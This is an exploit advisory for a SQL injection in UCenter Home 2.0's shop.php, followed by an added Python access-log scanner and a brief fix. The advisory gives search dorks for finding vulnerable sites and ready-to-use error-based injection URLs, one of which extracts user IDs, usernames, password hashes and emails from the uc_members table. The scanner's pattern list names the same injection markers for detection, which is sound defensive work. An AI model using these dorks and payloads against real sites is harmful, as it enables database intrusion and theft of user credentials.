__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__

*/ Author : KnocKout

*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers

*/ Contact: knockoutr@msn.com

*/ Cyber-Warrior.org/CWKnocKout

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Script : UCenter Home

Version : 2.0

Script HomePage : http://u.discuz.net/

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Dork : Powered by UCenter inurl:shop.php?ac=view

Dork 2 : inurl:shop.php?ac=view&shopid=

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Vuln file : Shop.php

Values : (?)ac=view&shopid=

Vulnerable Style : SQL Injection (MySQL Error Based)

Needed Materials : Hex Conversion

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

You need the victim's database name.

For inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

..

DB : Okey.

Edit the DB name: `[TARGET DB NAME]`

Example : 'hiwir1_ucenter'

Edit : Okey.

Use hex conversion, and edit your SQL injection exploit..

Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
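
A log check for the requests described above, as an added example that is not part of the original advisory: it flags shop.php requests whose shopid is not a plain integer and marks those carrying the error-based markers seen in the advisory's queries. The combined access-log format, the assumption that shopid is a numeric id, the function names and the sample lines are all constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line of a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (.+?) HTTP/[\d.]+"')
# Markers of the error-based technique the advisory sends through shopid.
MARKERS = [re.compile(p, re.I) for p in (
    r"floor\s*\(\s*rand\s*\(", r"information_schema", r"group\s+by", r"concat\s*\(")]

def classify_shopid(log_line):
    """Return 'clean', 'non_numeric' or 'error_based_sqli' for one log line,
    or None when it is not a shop.php request carrying shopid."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if not url.path.lower().endswith("/shop.php"):
        return None
    # parse_qs percent-decodes and maps '+' to a space, so encoded payloads
    # are matched in the form the application would receive them.
    values = parse_qs(url.query, keep_blank_values=True).get("shopid")
    if values is None:
        return None
    verdict = "clean"
    for value in values:  # a repeated parameter yields several values
        if re.fullmatch(r"[0-9]+", value):
            continue
        if sum(1 for p in MARKERS if p.search(value)) >= 2:
            return "error_based_sqli"
        verdict = "non_numeric"
    return verdict

def scan(lines):
    """Return (line_number, verdict) for every line that is not clean."""
    verdicts = ((n, classify_shopid(l)) for n, l in enumerate(lines, 1))
    return [(n, v) for n, v in verdicts if v not in (None, "clean")]

# Constructed sample log lines; the second is shortened from the advisory's request.
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] "GET /shop.php?ac=view&shopid=253 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2024:10:00:07 +0000] "GET /shop.php?ac=view&shopid=253%20and(select%201%20from(select%20count(*),concat(0x7e,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a) HTTP/1.1" 200 812',
    '203.0.113.7 - - [01/Jan/2024:10:01:30 +0000] "GET /shop.php?ac=view&shopid=abc HTTP/1.1" 200 640',
    '203.0.113.5 - - [01/Jan/2024:10:02:00 +0000] "GET /index.php HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for n, verdict in scan(SAMPLE_LOG):
        print(n, verdict)
```

On the application side the corresponding fix is to cast shopid to an integer, or bind it as a query parameter, before it reaches the SQL statement.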